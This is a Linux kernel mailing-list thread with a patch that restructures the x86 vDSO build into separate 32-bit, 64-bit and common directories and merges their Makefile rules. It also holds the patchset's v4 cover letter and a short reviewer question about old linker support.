arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
.../x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
21 files changed, 180 insertions(+), 186 deletions(-)
create mode 100644 arch/x86/entry/vdso/common/Makefile.include
rename arch/x86/entry/vdso/{vdso-note.S => common/note.S} (62%)
rename arch/x86/entry/vdso/{ => common}/vclock_gettime.c (100%)
rename arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S (100%)
rename arch/x86/entry/vdso/{ => common}/vgetcpu.c (100%)
create mode 100644 arch/x86/entry/vdso/vdso32/Makefile
create mode 100644 arch/x86/entry/vdso/vdso64/Makefile
create mode 100644 arch/x86/entry/vdso/vdso64/note.S
create mode 100644 arch/x86/entry/vdso/vdso64/vclock_gettime.c
rename arch/x86/entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} (94%)
rename arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S (92%)
create mode 100644 arch/x86/entry/vdso/vdso64/vgetcpu.c
rename arch/x86/entry/vdso/{ => vdso64}/vgetrandom-chacha.S (100%)
rename arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c (91%)
rename arch/x86/entry/vdso/{ => vdso64}/vsgx.S (100%)
diff --git a/arch/x86/entry/vdso/Makefile b/arch/x86/entry/vdso/Makefile
index 3d9b09f00c70..987b43fd4cd3 100644
--- a/arch/x86/entry/vdso/Makefile
+++ b/arch/x86/entry/vdso/Makefile
@@ -3,159 +3,10 @@
# Building vDSO images for x86.
#
-# Include the generic Makefile to check the built vDSO:
-include $(srctree)/lib/vdso/Makefile.include
+# Regular kernel objects
+obj-y := vma.o extable.o
+obj-$(CONFIG_COMPAT_32) += vdso32-setup.o
-# Files to link into the vDSO:
-vobjs-y := vdso-note.o vclock_gettime.o vgetcpu.o vgetrandom.o vgetrandom-chacha.o
-vobjs32-y := vdso32/note.o vdso32/system_call.o vdso32/sigreturn.o
-vobjs32-y += vdso32/vclock_gettime.o vdso32/vgetcpu.o
-vobjs-$(CONFIG_X86_SGX) += vsgx.o
-
-# Files to link into the kernel:
-obj-y += vma.o extable.o
-
-# vDSO images to build:
-obj-$(CONFIG_X86_64) += vdso64-image.o
-obj-$(CONFIG_X86_X32_ABI) += vdsox32-image.o
-obj-$(CONFIG_COMPAT_32) += vdso32-image.o vdso32-setup.o
-
-vobjs := $(addprefix $(obj)/, $(vobjs-y))
-vobjs32 := $(addprefix $(obj)/, $(vobjs32-y))
-
-$(obj)/vdso.o: $(obj)/vdso.so
-
-targets += vdso.lds $(vobjs-y)
-targets += vdso32/vdso32.lds $(vobjs32-y)
-
-targets += $(foreach x, 64 x32 32, vdso-image-$(x).c vdso$(x).so vdso$(x).so.dbg)
-
-CPPFLAGS_vdso.lds += -P -C
-
-VDSO_LDFLAGS_vdso.lds = -m elf_x86_64 -soname linux-vdso.so.1 \
- -z max-page-size=4096
-
-$(obj)/vdso64.so.dbg: $(obj)/vdso.lds $(vobjs) FORCE
- $(call if_changed,vdso_and_check)
-
-VDSO2C = $(objtree)/arch/x86/tools/vdso2c
-
-quiet_cmd_vdso2c = VDSO2C $@
- cmd_vdso2c = $(VDSO2C) $< $(<:%.dbg=%) $@
-
-$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(VDSO2C) FORCE
- $(call if_changed,vdso2c)
-
-#
-# Don't omit frame pointers for ease of userspace debugging, but do
-# optimize sibling calls.
-#
-CFL := $(PROFILING) -mcmodel=small -fPIC -O2 -fasynchronous-unwind-tables -m64 \
- $(filter -g%,$(KBUILD_CFLAGS)) -fno-stack-protector \
- -fno-omit-frame-pointer -foptimize-sibling-calls \
- -DDISABLE_BRANCH_PROFILING -DBUILD_VDSO
-
-ifdef CONFIG_MITIGATION_RETPOLINE
-ifneq ($(RETPOLINE_VDSO_CFLAGS),)
- CFL += $(RETPOLINE_VDSO_CFLAGS)
-endif
-endif
-
-$(vobjs): KBUILD_CFLAGS := $(filter-out $(PADDING_CFLAGS) $(CC_FLAGS_LTO) $(CC_FLAGS_CFI) $(RANDSTRUCT_CFLAGS) $(KSTACK_ERASE_CFLAGS) $(GCC_PLUGINS_CFLAGS) $(RETPOLINE_CFLAGS),$(KBUILD_CFLAGS)) $(CFL)
-$(vobjs): KBUILD_AFLAGS += -DBUILD_VDSO
-
-#
-# vDSO code runs in userspace and -pg doesn't help with profiling anyway.
-#
-CFLAGS_REMOVE_vclock_gettime.o = -pg
-CFLAGS_REMOVE_vdso32/vclock_gettime.o = -pg
-CFLAGS_REMOVE_vgetcpu.o = -pg
-CFLAGS_REMOVE_vdso32/vgetcpu.o = -pg
-CFLAGS_REMOVE_vsgx.o = -pg
-CFLAGS_REMOVE_vgetrandom.o = -pg
-
-#
-# X32 processes use x32 vDSO to access 64bit kernel data.
-#
-# Build x32 vDSO image:
-# 1. Compile x32 vDSO as 64bit.
-# 2. Convert object files to x32.
-# 3. Build x32 VDSO image with x32 objects, which contains 64bit codes
-# so that it can reach 64bit address space with 64bit pointers.
-#
-
-CPPFLAGS_vdsox32.lds = $(CPPFLAGS_vdso.lds)
-VDSO_LDFLAGS_vdsox32.lds = -m elf32_x86_64 -soname linux-vdso.so.1 \
- -z max-page-size=4096
-
-# x32-rebranded versions
-vobjx32s-y := $(vobjs-y:.o=-x32.o)
-
-# same thing, but in the output directory
-vobjx32s := $(addprefix $(obj)/, $(vobjx32s-y))
-
-# Convert 64bit object file to x32 for x32 vDSO.
-quiet_cmd_x32 = X32 $@
- cmd_x32 = $(OBJCOPY) -O elf32-x86-64 $< $@
-
-$(obj)/%-x32.o: $(obj)/%.o FORCE
- $(call if_changed,x32)
-
-targets += vdsox32.lds $(vobjx32s-y)
-
-$(obj)/%.so: OBJCOPYFLAGS := -S --remove-section __ex_table
-$(obj)/%.so: $(obj)/%.so.dbg FORCE
- $(call if_changed,objcopy)
-
-$(obj)/vdsox32.so.dbg: $(obj)/vdsox32.lds $(vobjx32s) FORCE
- $(call if_changed,vdso_and_check)
-
-CPPFLAGS_vdso32/vdso32.lds = $(CPPFLAGS_vdso.lds)
-VDSO_LDFLAGS_vdso32.lds = -m elf_i386 -soname linux-gate.so.1
-
-KBUILD_AFLAGS_32 := $(filter-out -m64,$(KBUILD_AFLAGS)) -DBUILD_VDSO
-$(obj)/vdso32.so.dbg: KBUILD_AFLAGS = $(KBUILD_AFLAGS_32)
-$(obj)/vdso32.so.dbg: asflags-$(CONFIG_X86_64) += -m32
-
-KBUILD_CFLAGS_32 := $(filter-out -m64,$(KBUILD_CFLAGS))
-KBUILD_CFLAGS_32 := $(filter-out -mcmodel=kernel,$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out -fno-pic,$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out -mfentry,$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(RANDSTRUCT_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(KSTACK_ERASE_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(GCC_PLUGINS_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(RETPOLINE_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(CC_FLAGS_LTO),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(CC_FLAGS_CFI),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(PADDING_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 += -m32 -msoft-float -mregparm=0 -fpic
-KBUILD_CFLAGS_32 += -fno-stack-protector
-KBUILD_CFLAGS_32 += $(call cc-option, -foptimize-sibling-calls)
-KBUILD_CFLAGS_32 += -fno-omit-frame-pointer
-KBUILD_CFLAGS_32 += -DDISABLE_BRANCH_PROFILING
-KBUILD_CFLAGS_32 += -DBUILD_VDSO
-
-ifdef CONFIG_MITIGATION_RETPOLINE
-ifneq ($(RETPOLINE_VDSO_CFLAGS),)
- KBUILD_CFLAGS_32 += $(RETPOLINE_VDSO_CFLAGS)
-endif
-endif
-
-$(obj)/vdso32.so.dbg: KBUILD_CFLAGS = $(KBUILD_CFLAGS_32)
-
-$(obj)/vdso32.so.dbg: $(obj)/vdso32/vdso32.lds $(vobjs32) FORCE
- $(call if_changed,vdso_and_check)
-
-#
-# The DSO images are built using a special linker script.
-#
-quiet_cmd_vdso = VDSO $@
- cmd_vdso = $(LD) -o $@ \
- $(VDSO_LDFLAGS) $(VDSO_LDFLAGS_$(filter %.lds,$(^F))) \
- -T $(filter %.lds,$^) $(filter %.o,$^)
-
-VDSO_LDFLAGS = -shared --hash-style=both --build-id=sha1 --no-undefined \
- $(call ld-option, --eh-frame-hdr) -Bsymbolic -z noexecstack
-
-quiet_cmd_vdso_and_check = VDSO $@
- cmd_vdso_and_check = $(cmd_vdso); $(cmd_vdso_check)
+# vDSO directories
+obj-$(CONFIG_X86_64) += vdso64/
+obj-$(CONFIG_COMPAT_32) += vdso32/
diff --git a/arch/x86/entry/vdso/common/Makefile.include b/arch/x86/entry/vdso/common/Makefile.include
new file mode 100644
index 000000000000..3514b4a6869b
--- /dev/null
+++ b/arch/x86/entry/vdso/common/Makefile.include
@@ -0,0 +1,89 @@
+# SPDX-License-Identifier: GPL-2.0
+#
+# Building vDSO images for x86.
+#
+
+# Include the generic Makefile to check the built vDSO:
+include $(srctree)/lib/vdso/Makefile.include
+
+obj-y += $(foreach x,$(vdsos-y),vdso$(x)-image.o)
+
+targets += $(foreach x,$(vdsos-y),vdso$(x)-image.c vdso$(x).so vdso$(x).so.dbg vdso$(x).lds)
+targets += $(vobjs-y)
+
+# vobjs-y with $(obj)/ prepended
+vobjs := $(addprefix $(obj)/,$(vobjs-y))
+
+# Options for vdso*.lds
+CPPFLAGS_VDSO_LDS := -P -C -I$(src)/..
+$(obj)/%.lds : KBUILD_CPPFLAGS += $(CPPFLAGS_VDSO_LDS)
+
+#
+# Options from KBUILD_[AC]FLAGS that should *NOT* be kept
+#
+flags-remove-y += \
+ -D__KERNEL__ -mcmodel=kernel -mregparm=3 \
+ -fno-pic -fno-PIC -fno-pie fno-PIE \
+ -mfentry -pg \
+ $(RANDSTRUCT_CFLAGS) $(GCC_PLUGIN_CFLAGS) $(KSTACK_ERASE_CFLAGS) \
+ $(RETPOLINE_CFLAGS) $(CC_FLAGS_LTO) $(CC_FLAGS_CFI) \
+ $(PADDING_CFLAGS)
+
+#
+# Don't omit frame pointers for ease of userspace debugging, but do
+# optimize sibling calls.
+#
+flags-y += -D__DISABLE_EXPORTS
+flags-y += -DDISABLE_BRANCH_PROFILING
+flags-y += -DBUILD_VDSO
+flags-y += -I$(src)/.. -I$(srctree)
+flags-y += -O2 -fpic
+flags-y += -fno-stack-protector
+flags-y += -fno-omit-frame-pointer
+flags-y += -foptimize-sibling-calls
+flags-y += -fasynchronous-unwind-tables
+
+# Reset cf protections enabled by compiler default
+flags-y += $(call cc-option, -fcf-protection=none)
+flags-$(X86_USER_SHADOW_STACK) += $(call cc-option, -fcf-protection=return)
+# When user space IBT is supported, enable this.
+# flags-$(CONFIG_USER_IBT) += $(call cc-option, -fcf-protection=branch)
+
+flags-$(CONFIG_MITIGATION_RETPOLINE) += $(RETPOLINE_VDSO_CFLAGS)
+
+# These need to be conditional on $(vobjs) as they do not apply to
+# the output vdso*-image.o files which are standard kernel objects.
+$(vobjs) : KBUILD_AFLAGS := \
+ $(filter-out $(flags-remove-y),$(KBUILD_AFLAGS)) $(flags-y)
+$(vobjs) : KBUILD_CFLAGS := \
+ $(filter-out $(flags-remove-y),$(KBUILD_CFLAGS)) $(flags-y)
+
+#
+# The VDSO images are built using a special linker script.
+#
+VDSO_LDFLAGS := -shared --hash-style=both --build-id=sha1 --no-undefined \
+ $(call ld-option, --eh-frame-hdr) -Bsymbolic -z noexecstack
+
+quiet_cmd_vdso = VDSO $@
+ cmd_vdso = $(LD) -o $@ \
+ $(VDSO_LDFLAGS) $(VDSO_LDFLAGS_$*) \
+ -T $(filter %.lds,$^) $(filter %.o,$^)
+quiet_cmd_vdso_and_check = VDSO $@
+ cmd_vdso_and_check = $(cmd_vdso); $(cmd_vdso_check)
+
+$(obj)/vdso%.so.dbg: $(obj)/vdso%.lds FORCE
+ $(call if_changed,vdso_and_check)
+
+$(obj)/%.so: OBJCOPYFLAGS := -S --remove-section __ex_table
+$(obj)/%.so: $(obj)/%.so.dbg FORCE
+ $(call if_changed,objcopy)
+
+VDSO2C = $(objtree)/arch/x86/tools/vdso2c
+
+quiet_cmd_vdso2c = VDSO2C $@
+ cmd_vdso2c = $(VDSO2C) $< $(<:%.dbg=%) $@
+
+$(obj)/%-image.c: $(obj)/%.so.dbg $(obj)/%.so $(VDSO2C) FORCE
+ $(call if_changed,vdso2c)
+
+$(obj)/%-image.o: $(obj)/%-image.c
diff --git a/arch/x86/entry/vdso/vdso-note.S b/arch/x86/entry/vdso/common/note.S
similarity index 62%
rename from arch/x86/entry/vdso/vdso-note.S
rename to arch/x86/entry/vdso/common/note.S
index 79423170118f..2cbd39939dc6 100644
--- a/arch/x86/entry/vdso/vdso-note.S
+++ b/arch/x86/entry/vdso/common/note.S
@@ -1,13 +1,16 @@
+/* SPDX-License-Identifier: GPL-2.0 */
/*
* This supplies .note.* sections to go into the PT_NOTE inside the vDSO text.
* Here we can supply some information useful to userland.
*/
#include <linux/build-salt.h>
-#include <linux/uts.h>
#include <linux/version.h>
#include <linux/elfnote.h>
+/* Ideally this would use UTS_NAME, but using a quoted string here
+ doesn't work. Remember to change this when changing the
+ kernel's name. */
ELFNOTE_START(Linux, 0, "a")
.long LINUX_VERSION_CODE
ELFNOTE_END
diff --git a/arch/x86/entry/vdso/vclock_gettime.c b/arch/x86/entry/vdso/common/vclock_gettime.c
similarity index 100%
rename from arch/x86/entry/vdso/vclock_gettime.c
rename to arch/x86/entry/vdso/common/vclock_gettime.c
diff --git a/arch/x86/entry/vdso/vdso-layout.lds.S b/arch/x86/entry/vdso/common/vdso-layout.lds.S
similarity index 100%
rename from arch/x86/entry/vdso/vdso-layout.lds.S
rename to arch/x86/entry/vdso/common/vdso-layout.lds.S
diff --git a/arch/x86/entry/vdso/vgetcpu.c b/arch/x86/entry/vdso/common/vgetcpu.c
similarity index 100%
rename from arch/x86/entry/vdso/vgetcpu.c
rename to arch/x86/entry/vdso/common/vgetcpu.c
diff --git a/arch/x86/entry/vdso/vdso32/Makefile b/arch/x86/entry/vdso/vdso32/Makefile
new file mode 100644
index 000000000000..add6afb484ba
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso32/Makefile
@@ -0,0 +1,24 @@
+# SPDX-License-Identifier: GPL-2.0
+#
+# 32-bit vDSO images for x86.
+#
+
+# The vDSOs built in this directory
+vdsos-y := 32
+
+# Files to link into the vDSO:
+vobjs-y := note.o vclock_gettime.o vgetcpu.o
+vobjs-y += system_call.o sigreturn.o
+
+# Compilation flags
+flags-y := -DBUILD_VDSO32 -m32 -mregparm=0
+flags-$(CONFIG_X86_64) += -include $(src)/fake_32bit_build.h
+flags-remove-y := -m64
+
+# The location of this include matters!
+include $(src)/../common/Makefile.include
+
+# Linker options for the vdso
+VDSO_LDFLAGS_32 := -m elf_i386 -soname linux-gate.so.1
+
+$(obj)/vdso32.so.dbg: $(vobjs)
diff --git a/arch/x86/entry/vdso/vdso32/note.S b/arch/x86/entry/vdso/vdso32/note.S
index 2cbd39939dc6..62d8aa51ce99 100644
--- a/arch/x86/entry/vdso/vdso32/note.S
+++ b/arch/x86/entry/vdso/vdso32/note.S
@@ -1,18 +1 @@
-/* SPDX-License-Identifier: GPL-2.0 */
-/*
- * This supplies .note.* sections to go into the PT_NOTE inside the vDSO text.
- * Here we can supply some information useful to userland.
- */
-
-#include <linux/build-salt.h>
-#include <linux/version.h>
-#include <linux/elfnote.h>
-
-/* Ideally this would use UTS_NAME, but using a quoted string here
- doesn't work. Remember to change this when changing the
- kernel's name. */
-ELFNOTE_START(Linux, 0, "a")
- .long LINUX_VERSION_CODE
-ELFNOTE_END
-
-BUILD_SALT
+#include "common/note.S"
diff --git a/arch/x86/entry/vdso/vdso32/system_call.S b/arch/x86/entry/vdso/vdso32/system_call.S
index d33c6513fd2c..2a15634bbe75 100644
--- a/arch/x86/entry/vdso/vdso32/system_call.S
+++ b/arch/x86/entry/vdso/vdso32/system_call.S
@@ -52,7 +52,7 @@ __kernel_vsyscall:
#define SYSENTER_SEQUENCE "movl %esp, %ebp; sysenter"
#define SYSCALL_SEQUENCE "movl %ecx, %ebp; syscall"
-#ifdef CONFIG_X86_64
+#ifdef BUILD_VDSO32_64
/* If SYSENTER (Intel) or SYSCALL32 (AMD) is available, use it. */
ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSENTER32, \
SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
diff --git a/arch/x86/entry/vdso/vdso32/vclock_gettime.c b/arch/x86/entry/vdso/vdso32/vclock_gettime.c
index 86981decfea8..1481f0021b9f 100644
--- a/arch/x86/entry/vdso/vdso32/vclock_gettime.c
+++ b/arch/x86/entry/vdso/vdso32/vclock_gettime.c
@@ -1,4 +1 @@
-// SPDX-License-Identifier: GPL-2.0
-#define BUILD_VDSO32
-#include "fake_32bit_build.h"
-#include "../vclock_gettime.c"
+#include "common/vclock_gettime.c"
diff --git a/arch/x86/entry/vdso/vdso32/vdso32.lds.S b/arch/x86/entry/vdso/vdso32/vdso32.lds.S
index 8a3be07006bb..8a853543fc0d 100644
--- a/arch/x86/entry/vdso/vdso32/vdso32.lds.S
+++ b/arch/x86/entry/vdso/vdso32/vdso32.lds.S
@@ -11,7 +11,7 @@
#define BUILD_VDSO32
-#include "../vdso-layout.lds.S"
+#include "common/vdso-layout.lds.S"
/* The ELF entry point can be used to set the AT_SYSINFO value. */
ENTRY(__kernel_vsyscall);
diff --git a/arch/x86/entry/vdso/vdso32/vgetcpu.c b/arch/x86/entry/vdso/vdso32/vgetcpu.c
index 3a9791f5e998..00cc8325a020 100644
--- a/arch/x86/entry/vdso/vdso32/vgetcpu.c
+++ b/arch/x86/entry/vdso/vdso32/vgetcpu.c
@@ -1,3 +1 @@
-// SPDX-License-Identifier: GPL-2.0
-#include "fake_32bit_build.h"
-#include "../vgetcpu.c"
+#include "common/vgetcpu.c"
diff --git a/arch/x86/entry/vdso/vdso64/Makefile b/arch/x86/entry/vdso/vdso64/Makefile
new file mode 100644
index 000000000000..bfffaf1aeecc
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/Makefile
@@ -0,0 +1,46 @@
+# SPDX-License-Identifier: GPL-2.0
+#
+# 64-bit vDSO images for x86.
+#
+
+# The vDSOs built in this directory
+vdsos-y := 64
+vdsos-$(CONFIG_X86_X32_ABI) += x32
+
+# Files to link into the vDSO:
+vobjs-y := note.o vclock_gettime.o vgetcpu.o
+vobjs-y += vgetrandom.o vgetrandom-chacha.o
+vobjs-$(CONFIG_X86_SGX) += vsgx.o
+
+# Compilation flags
+flags-y := -DBUILD_VDSO64 -m64 -mcmodel=small
+
+# The location of this include matters!
+include $(src)/../common/Makefile.include
+
+#
+# X32 processes use x32 vDSO to access 64bit kernel data.
+#
+# Build x32 vDSO image:
+# 1. Compile x32 vDSO as 64bit.
+# 2. Convert object files to x32.
+# 3. Build x32 VDSO image with x32 objects, which contains 64bit codes
+# so that it can reach 64bit address space with 64bit pointers.
+#
+
+# Convert 64bit object file to x32 for x32 vDSO.
+quiet_cmd_x32 = X32 $@
+ cmd_x32 = $(OBJCOPY) -O elf32-x86-64 $< $@
+
+$(obj)/%-x32.o: $(obj)/%.o FORCE
+ $(call if_changed,x32)
+
+vobjsx32 = $(patsubst %.o,%-x32.o,$(vobjs))
+targets += $(patsubst %.o,%-x32.o,$(vobjs-y))
+
+# Linker options for the vdso
+VDSO_LDFLAGS_64 := -m elf_x86_64 -soname linux-vdso.so.1 -z max-page-size=4096
+VDSO_LDFLAGS_x32 := $(subst elf_x86_64,elf32_x86_64,$(VDSO_LDFLAGS_64))
+
+$(obj)/vdso64.so.dbg: $(vobjs)
+$(obj)/vdsox32.so.dbg: $(vobjsx32)
diff --git a/arch/x86/entry/vdso/vdso64/note.S b/arch/x86/entry/vdso/vdso64/note.S
new file mode 100644
index 000000000000..62d8aa51ce99
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/note.S
@@ -0,0 +1 @@
+#include "common/note.S"
diff --git a/arch/x86/entry/vdso/vdso64/vclock_gettime.c b/arch/x86/entry/vdso/vdso64/vclock_gettime.c
new file mode 100644
index 000000000000..1481f0021b9f
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vclock_gettime.c
@@ -0,0 +1 @@
+#include "common/vclock_gettime.c"
diff --git a/arch/x86/entry/vdso/vdso.lds.S b/arch/x86/entry/vdso/vdso64/vdso64.lds.S
similarity index 94%
rename from arch/x86/entry/vdso/vdso.lds.S
rename to arch/x86/entry/vdso/vdso64/vdso64.lds.S
index 0bab5f4af6d1..5ce3f2b6373a 100644
--- a/arch/x86/entry/vdso/vdso.lds.S
+++ b/arch/x86/entry/vdso/vdso64/vdso64.lds.S
@@ -9,7 +9,7 @@
#define BUILD_VDSO64
-#include "vdso-layout.lds.S"
+#include "common/vdso-layout.lds.S"
/*
* This controls what userland symbols we export from the vDSO.
diff --git a/arch/x86/entry/vdso/vdsox32.lds.S b/arch/x86/entry/vdso/vdso64/vdsox32.lds.S
similarity index 92%
rename from arch/x86/entry/vdso/vdsox32.lds.S
rename to arch/x86/entry/vdso/vdso64/vdsox32.lds.S
index 16a8050a4fb6..3dbd20c8dacc 100644
--- a/arch/x86/entry/vdso/vdsox32.lds.S
+++ b/arch/x86/entry/vdso/vdso64/vdsox32.lds.S
@@ -9,7 +9,7 @@
#define BUILD_VDSOX32
-#include "vdso-layout.lds.S"
+#include "common/vdso-layout.lds.S"
/*
* This controls what userland symbols we export from the vDSO.
diff --git a/arch/x86/entry/vdso/vdso64/vgetcpu.c b/arch/x86/entry/vdso/vdso64/vgetcpu.c
new file mode 100644
index 000000000000..00cc8325a020
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vgetcpu.c
@@ -0,0 +1 @@
+#include "common/vgetcpu.c"
diff --git a/arch/x86/entry/vdso/vgetrandom-chacha.S b/arch/x86/entry/vdso/vdso64/vgetrandom-chacha.S
similarity index 100%
rename from arch/x86/entry/vdso/vgetrandom-chacha.S
rename to arch/x86/entry/vdso/vdso64/vgetrandom-chacha.S
diff --git a/arch/x86/entry/vdso/vgetrandom.c b/arch/x86/entry/vdso/vdso64/vgetrandom.c
similarity index 91%
rename from arch/x86/entry/vdso/vgetrandom.c
rename to arch/x86/entry/vdso/vdso64/vgetrandom.c
index 430862b8977c..6a95d36b12d9 100644
--- a/arch/x86/entry/vdso/vgetrandom.c
+++ b/arch/x86/entry/vdso/vdso64/vgetrandom.c
@@ -4,7 +4,7 @@
*/
#include <linux/types.h>
-#include "../../../../lib/vdso/getrandom.c"
+#include "lib/vdso/getrandom.c"
ssize_t __vdso_getrandom(void *buffer, size_t len, unsigned int flags, void *opaque_state, size_t opaque_len)
{
diff --git a/arch/x86/entry/vdso/vsgx.S b/arch/x86/entry/vdso/vdso64/vsgx.S
similarity index 100%
rename from arch/x86/entry/vdso/vsgx.S
rename to arch/x86/entry/vdso/vdso64/vsgx.S
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:25:57 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
On Tue, Dec 16, 2025 at 4:26 PM H. Peter Anvin <hpa@zytor.com> wrote:
Do we even still support the old linkers that need these constants?
Brian Gerst
|
{
"author": "Brian Gerst <brgerst@gmail.com>",
"date": "Wed, 17 Dec 2025 21:16:08 -0500",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
